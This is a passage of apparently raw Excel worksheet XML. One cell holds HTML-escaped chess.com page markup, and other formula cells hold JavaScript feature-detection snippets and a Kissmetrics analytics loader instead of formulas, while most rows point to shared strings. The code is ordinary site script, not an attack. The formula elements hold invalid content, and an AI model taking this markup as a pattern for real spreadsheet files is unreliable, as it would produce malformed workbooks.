window.chesscom.features = ['add_dimensions_to_uploaded_images_for_tinymce', 'amplitude_domain_proxy', 'ads_playwire_ramp', 'amplitude_onboarding_step_complete', 'block_report_friend', 'check_access_for_getting_leaderboard_stats_data', 'chessboard_beta', 'email_available_action', 'engine_animation_fix', 'evaluation_line_empty_fix', 'events_search_v2', 'friends_invite_links_update_metadata', 'friends_page_product', 'gift_modal_products_refactor', 'gift_modal_tax_included_redirect', 'hidden_nav_search_optimization', 'home_hide_activity_optimization', 'home_hide_awards_optimization', 'home_hide_clubs_and_club_events_optimization', 'home_hide_friends_optimization', 'home_hide_leagues_optimization', 'home_hide_stats_optimization', 'home_hide_streamers_optimization', 'home_hide_tournaments_optimization', 'home_game_review_optimization', 'home_league_optimization', 'home_play_vs_bot', 'home_promo_cache_puzzle_data', 'home_puzzle_optimization', 'home_re_add_quick_links', 'home_re_add_old_features', 'is_enabled_quick_search', 'library_logged_out_tabs', 'marketing_banners', 'marketing_middleware_serverside_device_id_generation', 'new_gifting_experience', 'new_lesson_complete_modal', 'free_trial_object_in_js_context', 'payments_donation_3ds2', 'payments_paypal_upgrade', 'payments_pre_september_price_change', 'payments_gift_on_local_currency', 'puzzle_battle_challenges_callback_reduction', 'refactored_vml_web_component', 'remove_empty_space_for_comments', 'sanction_russia_flag', 'sanction_belarus_flag', 'settings_service_data_sync', 'subscription_status_modal', 'toaster_center_rcn_offline_challenges', 'tinymce_rtl_support', 'use_fake_worker_stockfish', 'user_mention_mail_link_issue', 'vue_3_handle_upgrade_modal'];
&lt;/script&gt;
      &lt;script&gt;
  window.chesscom = window.chesscom || {};
  // Before adding global experiments please check in #experiments_chat slack channel for the performance costs
      window.chesscom.experiments = {}
  &lt;/script&gt;
  &lt;/head&gt;
&lt;body class=" dark-mode "  onkeydown="if (event.keyCode === 9) this.classList.add('keyboard-navigation-in-use')"
onmousedown="this.classList.remove('keyboard-navigation-in-use')"
&gt;
  &lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-WQJVC73"height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;
      &lt;div class="base-layout"&gt;
                                            &lt;div class="base-sidebar"&gt;
&lt;div id="login-register-modal"&gt;&lt;/div&gt;
&lt;div id="shareable-game-url-modal"&gt;&lt;/div&gt;
&lt;div id="message-modal"&gt;&lt;/div&gt;
&lt;div id="first-time-modal"&gt;&lt;/div&gt;
&lt;div id="achievements-modal"&gt;&lt;/div&gt;
&lt;div id="puzzle-battle-challenge-toaster"&gt;&lt;/div&gt;
&lt;div id="leagues-division-started-modal"&gt;&lt;/div&gt;
  &lt;div id="offline-challenge-toaster" data-badge="challenges" data-badge-count="0"&gt;&lt;/div&gt;
  &lt;div id="old-browser-modal"&gt;&lt;/div&gt;
&lt;div
  id="sb"
  style=""
  class="nav-component guest"
  data-constant-message-unread-count-max="100"
  data-notifications-limit="200"
  data-route-login-and-go="https://www.chess.com/login_and_go"
  data-route-register="https://www.chess.com/register"&gt;
    &lt;div id="sb-cover" data-mobile-nav-toggle&gt;&lt;/div&gt;
    &lt;div class="nav-action toggle close" data-mobile-nav-toggle&gt;
    &lt;span class="icon-font-chess x"&gt;&lt;/span&gt;
  &lt;/div&gt;
    &lt;div data-nav-top&gt;
        &lt;a
      aria-label="Chess.com - Play Chess Online"
      class="nav-link-component nav-link-main-design chess-logo-wrapper sprite chess-logo no-panel"
      data-nav-link="home"
      data-amplitude-nav-selection="home"
      href="https://www.chess.com/"
      target="_self"&gt;
      &lt;span class="nav-link-text mobile-only"&gt;Home&lt;/span&gt;
                  &lt;span class="navigation-badge-next" data-badge="alerts" data-badge-count="0"&gt;&lt;/span&gt;
                  &lt;/a&gt;
        &lt;a
      class="nav-link-component nav-link-main-design nav-link-top-level sprite play-top"
      data-amplitude-nav-selection="play"
      data-nav-link="play"
      href="https://www.chess.com/play"
      target="_self"&gt;
      &lt;span class="nav-link-text"&gt;Play&lt;/span&gt;
              &lt;span class="navigation-badge-next" data-badge="games" data-badge-count="0"&gt;&lt;/span&gt;
          &lt;/a&gt;
    &lt;div
      class="nav-panel-component"
      data-nav-panel="play"
      data-routes="{&amp;quot;leaderboard&amp;quot;:&amp;quot;https:\/\/www.chess.com\/leaderboard&amp;quot;,&amp;quot;live&amp;quot;:&amp;quot;https:\/\/www.chess.com\/live&amp;quot;,&amp;quot;daily&amp;quot;:&amp;quot;https:\/\/www.chess.com\/play\/online\/daily&amp;quot;,&amp;quot;computer&amp;quot;:&amp;quot;https:\/\/www.chess.com\/play\/computer&amp;quot;,&amp;quot;playOnline&amp;quot;:&amp;quot;https:\/\/www.chess.com\/play\/online&amp;quot;,&amp;quot;playPage&amp;quot;:&amp;quot;https:\/\/www.chess.com\/play&amp;quot;,&amp;quot;playFriend&amp;quot;:&amp;quot;https:\/\/www.chess.com\/play\/online\/friend&amp;quot;,&amp;quot;puzzleBattle&amp;quot;:&amp;quot;https:\/\/www.chess.com\/puzzles\/battle&amp;quot;,&amp;quot;puzzles&amp;quot;:&amp;quot;https:\/\/www.chess.com\/puzzles\/rush&amp;quot;,&amp;quot;tournamentsPlay&amp;quot;:&amp;quot;https:\/\/www.chess.com\/play\/online\/tournaments&amp;quot;,&amp;quot;tournaments&amp;quot;:&amp;quot;https:\/\/www.chess.com\/tournaments&amp;quot;,&amp;quot;library&amp;quot;:&amp;quot;https:\/\/www.chess.com\/library&amp;quot;,&amp;quot;gameArchive&amp;quot;:&amp;quot;https:\/\/www.chess.com\/games\/archive&amp;quot;,&amp;quot;variants&amp;quot;:&amp;quot;https:\/\/www.chess.com\/variants&amp;quot;}"&gt;
    &lt;/div&gt;
        &lt;a
      class="nav-link-component nav-link-main-design nav-link-top-level sprite puzzles-top"
      data-amplitude-nav-selection="puzzles"
      data-nav-link="puzzles"
      href="https://www.chess.com/puzzles"
      target="_self"&gt;
      &lt;span class="nav-link-text"&gt;Puzzles&lt;/span&gt;
    &lt;/a&gt;
    &lt;div
      class="nav-panel-component"
      data-nav-panel="puzzles"
      data-routes="{&amp;quot;dailyPuzzle&amp;quot;:&amp;quot;https:\/\/www.chess.com\/daily-chess-puzzle&amp;quot;,&amp;quot;drills&amp;quot;:&amp;quot;https:\/\/www.chess.com\/drills&amp;quot;,&amp;quot;endgames&amp;quot;:&amp;quot;https:\/\/www.chess.com\/endgames&amp;quot;,&amp;quot;practice&amp;quot;:&amp;quot;https:\/\/www.chess.com\/practice&amp;quot;,&amp;quot;puzzleBattle&amp;quot;:&amp;quot;https:\/\/www.chess.com\/puzzles\/battle&amp;quot;,&amp;quot;puzzlesCustom&amp;quot;:&amp;quot;https:\/\/www.chess.com\/puzzles\/learning&amp;quot;,&amp;quot;puzzlesRush&amp;quot;:&amp;quot;https:\/\/www.chess.com\/puzzles\/rush&amp;quot;,&amp;quot;puzzlesRated&amp;quot;:&amp;quot;https:\/\/www.chess.com\/puzzles\/rated&amp;quot;,&amp;quot;tactics&amp;quot;:&amp;quot;https:\/\/www.chess.com\/puzzles&amp;quot;,&amp;quot;soloChess&amp;quot;:&amp;quot;https:\/\/www.chess.com\/solo-chess&amp;quot;}"&gt;
    &lt;/div&gt;
        &lt;a
      class="nav-link-component nav-link-main-design nav-link-top-level sprite learn-top"
      data-amplitude-nav-selection="learn"
      data-nav-link="learn"
      href="https://www.chess.com/learn"
      target="_self"&gt;
      &lt;span class="nav-link-text"&gt;Learn&lt;/span&gt;
    &lt;/a&gt;
    &lt;div
      class="nav-panel-component"
      data-nav-panel="learn"
      data-routes="{&amp;quot;analysis&amp;quot;:&amp;quot;https:\/\/www.chess.com\/analysis&amp;quot;,&amp;quot;classroom&amp;quot;:&amp;quot;https:\/\/www.chess.com\/classroom&amp;quot;,&amp;quot;endgames&amp;quot;:&amp;quot;https:\/\/www.chess.com\/endgames&amp;quot;,&amp;quot;insights&amp;quot;:&amp;quot;https:\/\/www.chess.com\/insights&amp;quot;,&amp;quot;lessons&amp;quot;:&amp;quot;https:\/\/www.chess.com\/lessons&amp;quot;,&amp;quot;openings&amp;quot;:&amp;quot;https:\/\/www.chess.com\/openings&amp;quot;,&amp;quot;practice&amp;quot;:&amp;quot;https:\/\/www.chess.com\/practice&amp;quot;}"&gt;
    &lt;/div&gt;
    &lt;a
      class="nav-link-component nav-link-main-design nav-link-top-level sprite watch-top"
      data-amplitude-nav-selection="watch"
      data-nav-link="watch"
      href="https://www.chess.com/watch"
      target="_self"&gt;
      &lt;span class="nav-link-text"&gt;Watch&lt;/span&gt;
    &lt;/a&gt;
    &lt;div
      class="nav-panel-component"
      data-nav-panel="watch"
      data-routes="{&amp;quot;chessToday&amp;quot;:&amp;quot;https:\/\/www.chess.com\/today&amp;quot;,&amp;quot;computerChampionship&amp;quot;:&amp;quot;https:\/\/www.chess.com\/computer-chess-championship&amp;quot;,&amp;quot;events&amp;quot;:&amp;quot;https:\/\/www.chess.com\/events&amp;quot;,&amp;quot;news&amp;quot;:&amp;quot;https:\/\/www.chess.com\/news&amp;quot;,&amp;quot;proChessLeague&amp;quot;:&amp;quot;http:\/\/www.prochessleague.com&amp;quot;,&amp;quot;streamers&amp;quot;:&amp;quot;https:\/\/www.chess.com\/streamers&amp;quot;}"&gt;
    &lt;/div&gt;
        &lt;a
      class="nav-link-component nav-link-main-design nav-link-top-level sprite news-top"
      data-amplitude-nav-selection="news"
      data-nav-link="news"
      href="https://www.chess.com/today"
      target="_self"&gt;
      &lt;span class="nav-link-text"&gt;News&lt;/span&gt;
    &lt;/a&gt;
    &lt;div
      class="nav-panel-component"
      data-nav-panel="news"
      data-routes="{&amp;quot;articles&amp;quot;:&amp;quot;https:\/\/www.chess.com\/articles&amp;quot;,&amp;quot;chessToday&amp;quot;:&amp;quot;https:\/\/www.chess.com\/today&amp;quot;,&amp;quot;liveRankings&amp;quot;:&amp;quot;https:\/\/www.chess.com\/ratings&amp;quot;,&amp;quot;news&amp;quot;:&amp;quot;https:\/\/www.chess.com\/news&amp;quot;,&amp;quot;topPlayers&amp;quot;:&amp;quot;https:\/\/www.chess.com\/players&amp;quot;}"&gt;
    &lt;/div&gt;
        &lt;a
      class="nav-link-component nav-link-main-design nav-link-top-level sprite social-page"
      data-amplitude-nav-selection="social"
      data-nav-link="social"
      href="https://www.chess.com/social"
      target="_self"&gt;
      &lt;span class="nav-link-text"&gt;Social&lt;/span&gt;
          &lt;/a&gt;
    &lt;div
      class="nav-panel-component"
      data-nav-panel="social"
      data-routes="{&amp;quot;articles&amp;quot;:&amp;quot;https:\/\/www.chess.com\/articles&amp;quot;,&amp;quot;news&amp;quot;:&amp;quot;https:\/\/www.chess.com\/news&amp;quot;,&amp;quot;forums&amp;quot;:&amp;quot;https:\/\/www.chess.com\/forum&amp;quot;,&amp;quot;blogs&amp;quot;:&amp;quot;https:\/\/www.chess.com\/blogs&amp;quot;,&amp;quot;clubs&amp;quot;:&amp;quot;https:\/\/www.chess.com\/clubs&amp;quot;,&amp;quot;friends&amp;quot;:&amp;quot;https:\/\/www.chess.com\/friends&amp;quot;,&amp;quot;members&amp;quot;:&amp;quot;https:\/\/www.chess.com\/members&amp;quot;,&amp;quot;coaches&amp;quot;:&amp;quot;https:\/\/www.chess.com\/coaches&amp;quot;}"&gt;
    &lt;/div&gt;
          &lt;button
        aria-label="More"
        class="nav-link-component nav-link-main-design nav-link-button nav-link-top-level sprite more-top"
        data-amplitude-nav-selection="more"
        goto="https://www.chess.com/more"
        data-nav-link="more"&gt;
        &lt;span class="nav-link-text"&gt;More&lt;/span&gt;
      &lt;/button&gt;
    &lt;div
      class="nav-panel-component"
      data-nav-panel="more"
      data-routes="{&amp;quot;computerChampionship&amp;quot;:&amp;quot;https:\/\/www.chess.com\/computer-chess-championship&amp;quot;,&amp;quot;explorer&amp;quot;:&amp;quot;https:\/\/www.chess.com\/explorer&amp;quot;,&amp;quot;gift&amp;quot;:&amp;quot;https:\/\/www.chess.com\/membership\/gift&amp;quot;,&amp;quot;library&amp;quot;:&amp;quot;https:\/\/www.chess.com\/library&amp;quot;,&amp;quot;masterGames&amp;quot;:&amp;quot;https:\/\/www.chess.com\/games&amp;quot;,&amp;quot;mobileApps&amp;quot;:&amp;quot;https:\/\/www.chess.com\/play\/apps&amp;quot;,&amp;quot;resourcesPage&amp;quot;:&amp;quot;https:\/\/www.chess.com\/resources&amp;quot;,&amp;quot;rules&amp;quot;:&amp;quot;https:\/\/www.chess.com\/learn-how-to-play-chess&amp;quot;,&amp;quot;soloChess&amp;quot;:&amp;quot;https:\/\/www.chess.com\/solo-chess&amp;quot;,&amp;quot;terms&amp;quot;:&amp;quot;https:\/\/www.chess.com\/terms&amp;quot;,&amp;quot;verified&amp;quot;:&amp;quot;https:\/\/www.chess.com\/verified&amp;quot;,&amp;quot;videos&amp;quot;:&amp;quot;https:\/\/www.chess.com\/videos&amp;quot;,&amp;quot;vision&amp;quot;:&amp;quot;https:\/\/www.chess.com\/vision&amp;quot;,&amp;quot;voteChess&amp;quot;:&amp;quot;https:\/\/www.chess.com\/votechess&amp;quot;}"&gt;
    &lt;/div&gt;
      &lt;a
        id="menu-cta"
        data-amplitude-props="{&amp;quot;source&amp;quot;:&amp;quot;Unknown&amp;quot;}"
        href="https://www.chess.com/register?returnUrl=https://www.chess.com/legal/privacy"
        target="_self"
        rel="nofollow"
        class="button auth signup register ui_v5-button-component ui_v5-button-basic-dark authentication-modal-trigger"&gt;
        &lt;span class="icon-font-chess icon user-plus"&gt;&lt;/span&gt;
        &lt;span class="label"&gt;Sign Up&lt;/span&gt;
      &lt;/a&gt;
            &lt;a
        href="https://www.chess.com/login_and_go?returnUrl=https://www.chess.com/legal/privacy"
        target="_self"
        rel="nofollow"
        class="button auth login ui_v5-button-component ui_v5-button-primary login-modal-trigger"&gt;
        &lt;span class="icon-font-chess icon enter"&gt;&lt;/span&gt;
        &lt;span class="label"&gt;Log In&lt;/span&gt;
      &lt;/a&gt;
                &lt;/div&gt;
    &lt;div class="nav-menu-area"&gt;
              &lt;button
        aria-label="Change language"
        class="nav-action language-select"
        type="button"&gt;
        &lt;span class="icon-font-chess nav-language-icon globe"&gt;&lt;/span&gt;
        &lt;span class="nav-link-text nav-language-name"&gt;
          English
        &lt;/span&gt;
      &lt;/button&gt;
              &lt;button
        aria-label="Light/Dark Interface"
        class="nav-action ui-mode"
        data-amplitude-nav-selection="subnav-uimode"
        data-nav-ui-mode
        type="button"&gt;
        &lt;div id="mode"&gt;
          &lt;span class="icon-font-chess darklight"&gt;&lt;/span&gt;
        &lt;/div&gt;
        &lt;span class="nav-link-text"&gt;
          &lt;span class="light"&gt;Light UI&lt;/span&gt;
          &lt;span class="dark"&gt;Dark UI&lt;/span&gt;
        &lt;/span&gt;
      &lt;/button&gt;
        &lt;button
      type="button"
      aria-label="Help"
      class="nav-action has-popover help"
      data-amplitude-nav-selection="subnav-help"
      type="button"&gt;
      &lt;span class="icon-font-chess circle-question"&gt;&lt;/span&gt;
      &lt;span class="nav-link-text"&gt;Help&lt;/span&gt;
    &lt;/button&gt;
        &lt;div class="dark nav-popover help"&gt;
            &lt;div class="arrow"&gt;&lt;/div&gt;
            &lt;button
        type="button"
        class="btn-link help-scout"
        data-amplitude-nav-selection="subnav-help-askaquestion"&gt;
        &lt;span class="icon-font-chess circle-question"&gt;&lt;/span&gt;
        &lt;span class="title"&gt;Ask a Question&lt;/span&gt;
      &lt;/button&gt;
            &lt;a
        data-amplitude-nav-selection="subnav-help-reportabuse"
        class="btn-link"
        rel="noopener"
        href="https://support.chess.com/collection/136-community-safety"
        target="_blank"&gt;
        &lt;span class="icon-font-chess circle-block"&gt;&lt;/span&gt;
        &lt;span class="title"&gt;Report Abuse&lt;/span&gt;
      &lt;/a&gt;
            &lt;button
        type="button"
        class="btn-link user-snap"
        data-amplitude-nav-selection="subnav-help-makeasuggestion"&gt;
        &lt;span class="icon-font-chess lightbulb"&gt;&lt;/span&gt;
        &lt;span class="title"&gt;Make a Suggestion&lt;/span&gt;
      &lt;/button&gt;
            &lt;a
        data-amplitude-nav-selection="subnav-help-billingissues"
        class="btn-link"
        rel="noopener"
        href="https://support.chess.com/category/135-membership-and-billing"
        target="_blank"&gt;
        &lt;span class="icon-font-chess card"&gt;&lt;/span&gt;
        &lt;span class="title"&gt;Billing Issues&lt;/span&gt;
      &lt;/a&gt;
            &lt;button
        type="button"
        class="btn-link user-snap"
        data-amplitude-nav-selection="subnav-help-reportabug"&gt;
        &lt;span class="icon-font-chess bug"&gt;&lt;/span&gt;
        &lt;span class="title"&gt;Report a Bug&lt;/span&gt;
      &lt;/button&gt;
          &lt;/div&gt;
      &lt;/div&gt;
  &lt;/div&gt;
          &lt;/div&gt;
            &lt;div class="base-container"&gt;
        &lt;div id="scroll-top-anchor"&gt;&lt;/div&gt;
                          &lt;div id="language-banner"&gt;&lt;/div&gt;
                            &lt;header id="tb" class="toolbar-new-wrapper "&gt;
    &lt;div class="toolbar-menu-area toolbar-menu-area-left"&gt;
        &lt;div class="toolbar-action toggle open" data-mobile-nav-toggle&gt;
      &lt;span class="icon-font-chess menu toolbar-action-icon"&gt;&lt;/span&gt;
    &lt;/div&gt;
        &lt;a
      href="https://www.chess.com/"
      class="link chess-logo-wrapper sprite chess-logo"
      aria-label="Chess.com - Play Chess Online"&gt;
    &lt;/a&gt;
      &lt;/div&gt;
          &lt;div class="toolbar-menu-area mobile-auth-actions  "&gt;
  &lt;a
    class="mobile-auth-action ui_v5-button-component ui_v5-button-basic-dark ui_v5-button-x-small sign-up-eng"
    href="https://www.chess.com/register?returnUrl=https://www.chess.com/legal/privacy"
    rel="nofollow"
    title="Sign Up"&gt;
    Sign Up
  &lt;/a&gt;
  </f>
        <v>0</v>
      </c>
    </row>
    <row r="5303" spans="1:2">
      <c r="A5303" t="s">
        <v>58</v>
      </c>
      <c r="B5303" t="s">
        <v>3473</v>
      </c>
    </row>
    <row r="5304" spans="1:2">
      <c r="A5304" t="s">
        <v>58</v>
      </c>
      <c r="B5304" t="s">
        <v>3474</v>
      </c>
    </row>
    <row r="5305" spans="1:2">
      <c r="A5305" t="s">
        <v>58</v>
      </c>
      <c r="B5305" t="s">
        <v>3475</v>
      </c>
    </row>
    <row r="5306" spans="1:2">
      <c r="A5306" t="s">
        <v>58</v>
      </c>
      <c r="B5306" t="s">
        <v>3476</v>
      </c>
    </row>
    <row r="5307" spans="1:2">
      <c r="A5307" t="s">
        <v>58</v>
      </c>
      <c r="B5307" t="s">
        <v>3477</v>
      </c>
    </row>
    <row r="5308" spans="1:2">
      <c r="A5308" t="s">
        <v>58</v>
      </c>
      <c r="B5308" t="s">
        <v>3478</v>
      </c>
    </row>
    <row r="5309" spans="1:2">
      <c r="A5309" t="s">
        <v>58</v>
      </c>
      <c r="B5309" t="s">
        <v>3479</v>
      </c>
    </row>
    <row r="5310" spans="1:2">
      <c r="A5310" t="s">
        <v>58</v>
      </c>
      <c r="B5310" t="s">
        <v>3480</v>
      </c>
    </row>
    <row r="5311" spans="1:2">
      <c r="A5311" t="s">
        <v>134</v>
      </c>
      <c r="B5311" t="s">
        <v>3481</v>
      </c>
    </row>
    <row r="5312" spans="1:2">
      <c r="A5312" t="s">
        <v>134</v>
      </c>
      <c r="B5312" t="s">
        <v>3482</v>
      </c>
    </row>
    <row r="5313" spans="1:2">
      <c r="A5313" t="s">
        <v>134</v>
      </c>
      <c r="B5313" t="s">
        <v>3483</v>
      </c>
    </row>
    <row r="5314" spans="1:2">
      <c r="A5314" t="s">
        <v>134</v>
      </c>
      <c r="B5314" t="s">
        <v>3484</v>
      </c>
    </row>
    <row r="5315" spans="1:2">
      <c r="A5315" t="s">
        <v>134</v>
      </c>
      <c r="B5315" t="s">
        <v>3485</v>
      </c>
    </row>
    <row r="5316" spans="1:2">
      <c r="A5316" t="s">
        <v>134</v>
      </c>
      <c r="B5316" t="s">
        <v>3486</v>
      </c>
    </row>
    <row r="5317" spans="1:2">
      <c r="A5317" t="s">
        <v>134</v>
      </c>
      <c r="B5317" t="s">
        <v>3487</v>
      </c>
    </row>
    <row r="5318" spans="1:2">
      <c r="A5318" t="s">
        <v>135</v>
      </c>
      <c r="B5318" t="s">
        <v>3488</v>
      </c>
    </row>
    <row r="5319" spans="1:2">
      <c r="A5319" t="s">
        <v>135</v>
      </c>
      <c r="B5319" t="s">
        <v>3489</v>
      </c>
    </row>
    <row r="5320" spans="1:2">
      <c r="A5320" t="s">
        <v>135</v>
      </c>
      <c r="B5320" t="s">
        <v>3490</v>
      </c>
    </row>
    <row r="5321" spans="1:2">
      <c r="A5321" t="s">
        <v>135</v>
      </c>
      <c r="B5321" t="s">
        <v>3491</v>
      </c>
    </row>
    <row r="5322" spans="1:2">
      <c r="A5322" t="s">
        <v>135</v>
      </c>
      <c r="B5322" t="s">
        <v>3492</v>
      </c>
    </row>
    <row r="5323" spans="1:2">
      <c r="A5323" t="s">
        <v>135</v>
      </c>
      <c r="B5323" t="s">
        <v>3493</v>
      </c>
    </row>
    <row r="5324" spans="1:2">
      <c r="A5324" t="s">
        <v>135</v>
      </c>
      <c r="B5324" t="s">
        <v>3494</v>
      </c>
    </row>
    <row r="5325" spans="1:2">
      <c r="A5325" t="s">
        <v>135</v>
      </c>
      <c r="B5325" t="s">
        <v>3495</v>
      </c>
    </row>
    <row r="5326" spans="1:2">
      <c r="A5326" t="s">
        <v>135</v>
      </c>
      <c r="B5326" t="s">
        <v>3496</v>
      </c>
    </row>
    <row r="5327" spans="1:2">
      <c r="A5327" t="s">
        <v>135</v>
      </c>
      <c r="B5327" t="s">
        <v>3497</v>
      </c>
    </row>
    <row r="5328" spans="1:2">
      <c r="A5328" t="s">
        <v>135</v>
      </c>
      <c r="B5328" t="s">
        <v>3498</v>
      </c>
    </row>
    <row r="5329" spans="1:2">
      <c r="A5329" t="s">
        <v>135</v>
      </c>
      <c r="B5329" t="s">
        <v>3499</v>
      </c>
    </row>
    <row r="5330" spans="1:2">
      <c r="A5330" t="s">
        <v>135</v>
      </c>
      <c r="B5330" t="s">
        <v>3500</v>
      </c>
    </row>
    <row r="5331" spans="1:2">
      <c r="A5331" t="s">
        <v>135</v>
      </c>
      <c r="B5331" t="s">
        <v>3501</v>
      </c>
    </row>
    <row r="5332" spans="1:2">
      <c r="A5332" t="s">
        <v>135</v>
      </c>
      <c r="B5332" t="s">
        <v>3502</v>
      </c>
    </row>
    <row r="5333" spans="1:2">
      <c r="A5333" t="s">
        <v>135</v>
      </c>
      <c r="B5333" t="s">
        <v>3503</v>
      </c>
    </row>
    <row r="5334" spans="1:2">
      <c r="A5334" t="s">
        <v>135</v>
      </c>
      <c r="B5334" t="s">
        <v>3504</v>
      </c>
    </row>
    <row r="5335" spans="1:2">
      <c r="A5335" t="s">
        <v>135</v>
      </c>
      <c r="B5335" t="s">
        <v>3505</v>
      </c>
    </row>
    <row r="5336" spans="1:2">
      <c r="A5336" t="s">
        <v>135</v>
      </c>
      <c r="B5336" t="s">
        <v>3506</v>
      </c>
    </row>
    <row r="5337" spans="1:2">
      <c r="A5337" t="s">
        <v>135</v>
      </c>
      <c r="B5337" t="s">
        <v>3507</v>
      </c>
    </row>
    <row r="5338" spans="1:2">
      <c r="A5338" t="s">
        <v>135</v>
      </c>
      <c r="B5338" t="s">
        <v>3508</v>
      </c>
    </row>
    <row r="5339" spans="1:2">
      <c r="A5339" t="s">
        <v>135</v>
      </c>
      <c r="B5339" t="s">
        <v>3509</v>
      </c>
    </row>
    <row r="5340" spans="1:2">
      <c r="A5340" t="s">
        <v>135</v>
      </c>
      <c r="B5340" t="s">
        <v>3510</v>
      </c>
    </row>
    <row r="5341" spans="1:2">
      <c r="A5341" t="s">
        <v>135</v>
      </c>
      <c r="B5341" t="s">
        <v>3511</v>
      </c>
    </row>
    <row r="5342" spans="1:2">
      <c r="A5342" t="s">
        <v>135</v>
      </c>
      <c r="B5342" t="s">
        <v>3512</v>
      </c>
    </row>
    <row r="5343" spans="1:2">
      <c r="A5343" t="s">
        <v>135</v>
      </c>
      <c r="B5343" t="s">
        <v>3513</v>
      </c>
    </row>
    <row r="5344" spans="1:2">
      <c r="A5344" t="s">
        <v>135</v>
      </c>
      <c r="B5344" t="s">
        <v>3514</v>
      </c>
    </row>
    <row r="5345" spans="1:2">
      <c r="A5345" t="s">
        <v>135</v>
      </c>
      <c r="B5345" t="s">
        <v>3515</v>
      </c>
    </row>
    <row r="5346" spans="1:2">
      <c r="A5346" t="s">
        <v>135</v>
      </c>
      <c r="B5346" t="s">
        <v>3516</v>
      </c>
    </row>
    <row r="5347" spans="1:2">
      <c r="A5347" t="s">
        <v>135</v>
      </c>
      <c r="B5347" t="s">
        <v>3517</v>
      </c>
    </row>
    <row r="5348" spans="1:2">
      <c r="A5348" t="s">
        <v>136</v>
      </c>
      <c r="B5348" t="s">
        <v>3518</v>
      </c>
    </row>
    <row r="5349" spans="1:2">
      <c r="A5349" t="s">
        <v>136</v>
      </c>
      <c r="B5349" t="s">
        <v>3519</v>
      </c>
    </row>
    <row r="5350" spans="1:2">
      <c r="A5350" t="s">
        <v>136</v>
      </c>
      <c r="B5350" t="s">
        <v>3520</v>
      </c>
    </row>
    <row r="5351" spans="1:2">
      <c r="A5351" t="s">
        <v>136</v>
      </c>
      <c r="B5351" t="s">
        <v>3521</v>
      </c>
    </row>
    <row r="5352" spans="1:2">
      <c r="A5352" t="s">
        <v>136</v>
      </c>
      <c r="B5352" t="s">
        <v>3522</v>
      </c>
    </row>
    <row r="5353" spans="1:2">
      <c r="A5353" t="s">
        <v>136</v>
      </c>
      <c r="B5353" t="s">
        <v>3523</v>
      </c>
    </row>
    <row r="5354" spans="1:2">
      <c r="A5354" t="s">
        <v>136</v>
      </c>
      <c r="B5354" t="s">
        <v>3524</v>
      </c>
    </row>
    <row r="5355" spans="1:2">
      <c r="A5355" t="s">
        <v>136</v>
      </c>
      <c r="B5355" t="s">
        <v>3525</v>
      </c>
    </row>
    <row r="5356" spans="1:2">
      <c r="A5356" t="s">
        <v>136</v>
      </c>
      <c r="B5356" t="s">
        <v>3526</v>
      </c>
    </row>
    <row r="5357" spans="1:2">
      <c r="A5357" t="s">
        <v>136</v>
      </c>
      <c r="B5357" t="s">
        <v>3527</v>
      </c>
    </row>
    <row r="5358" spans="1:2">
      <c r="A5358" t="s">
        <v>136</v>
      </c>
      <c r="B5358" t="s">
        <v>3528</v>
      </c>
    </row>
    <row r="5359" spans="1:2">
      <c r="A5359" t="s">
        <v>136</v>
      </c>
      <c r="B5359" t="s">
        <v>3529</v>
      </c>
    </row>
    <row r="5360" spans="1:2">
      <c r="A5360" t="s">
        <v>136</v>
      </c>
      <c r="B5360" t="s">
        <v>3530</v>
      </c>
    </row>
    <row r="5361" spans="1:2">
      <c r="A5361" t="s">
        <v>136</v>
      </c>
      <c r="B5361" t="s">
        <v>3531</v>
      </c>
    </row>
    <row r="5362" spans="1:2">
      <c r="A5362" t="s">
        <v>136</v>
      </c>
      <c r="B5362">
        <f> 0) =&gt; a")(),new Function("class MyEvent extends Event{}")(),!1===new Function("return new Boolean(Symbol.match)")()?!1:(new Function("new.target")(),new Function('class ಠ_ಠ extends Array {constructor(j = "a", ...c) {const q = (({u: e}) =&gt; {return { [`s${c}`]: Symbol(j) };})({});super(j, q, ...c);}}new Promise((f)</f>
        <v>0</v>
      </c>
    </row>
    <row r="5363" spans="1:2">
      <c r="A5363" t="s">
        <v>136</v>
      </c>
      <c r="B5363">
        <f>&gt; {const a = function* (){return "𠮷".match(/./u)[0].length === 2 || true;};for (let vre of a()) {const [uw, as, he, re] = [new Set(), new WeakSet(), new Map(), new WeakMap()];break;}f(new Proxy({}, {get: (han, h) =&gt; h in han ?</f>
        <v>0</v>
      </c>
    </row>
    <row r="5364" spans="1:2">
      <c r="A5364" t="s">
        <v>136</v>
      </c>
      <c r="B5364" t="s">
        <v>3532</v>
      </c>
    </row>
    <row r="5365" spans="1:2">
      <c r="A5365" t="s">
        <v>113</v>
      </c>
      <c r="B5365" t="s">
        <v>2914</v>
      </c>
    </row>
    <row r="5366" spans="1:2">
      <c r="A5366" t="s">
        <v>113</v>
      </c>
      <c r="B5366" t="s">
        <v>2915</v>
      </c>
    </row>
    <row r="5367" spans="1:2">
      <c r="A5367" t="s">
        <v>113</v>
      </c>
      <c r="B5367" t="s">
        <v>2916</v>
      </c>
    </row>
    <row r="5368" spans="1:2">
      <c r="A5368" t="s">
        <v>113</v>
      </c>
      <c r="B5368">
        <f> _kmq || [];
    function _kms(u){
      setTimeout(function(){
        var d = document, f = d.getElementsByTagName('script')[0],
        s = d.createElement('script');
        s.type = 'text/javascript'; s.async = true; s.src = u;
        f.parentNode.insertBefore(s, f);
      }, 1);
    }
    _kms('//i.kissmetrics.com/i.js');
    _kms('//doug1izaerwt3.cloudfront.net/' + _kmk + '.2.js');
  &lt;/script&gt;
    &lt;!--</f>
        <v>0</v>
      </c>
    </row>
    <row r="5369" spans="1:2">
      <c r="A5369" t="s">
        <v>113</v>
      </c>
      <c r="B5369" t="s">
        <v>2917</v>
      </c>
    </row>
    <row r="5370" spans="1:2">
      <c r="A5370" t="s">
        <v>113</v>
      </c>
      <c r="B5370" t="s">
        <v>2918</v>
      </c>
    </row>
    <row r="5371" spans="1:2">
      <c r="A5371" t="s">
        <v>113</v>
      </c>
      <c r="B5371" t="s">
        <v>2919</v>
      </c>
    </row>
    <row r="5372" spans="1:2">
      <c r="A5372" t="s">
        <v>113</v>
      </c>
      <c r="B5372" t="s">
        <v>2920</v>
      </c>
    </row>
    <row r="5373" spans="1:2">
      <c r="A5373" t="s">
        <v>113</v>
      </c>
      <c r="B5373" t="s">
        <v>2921</v>
      </c>
    </row>
    <row r="5374" spans="1:2">
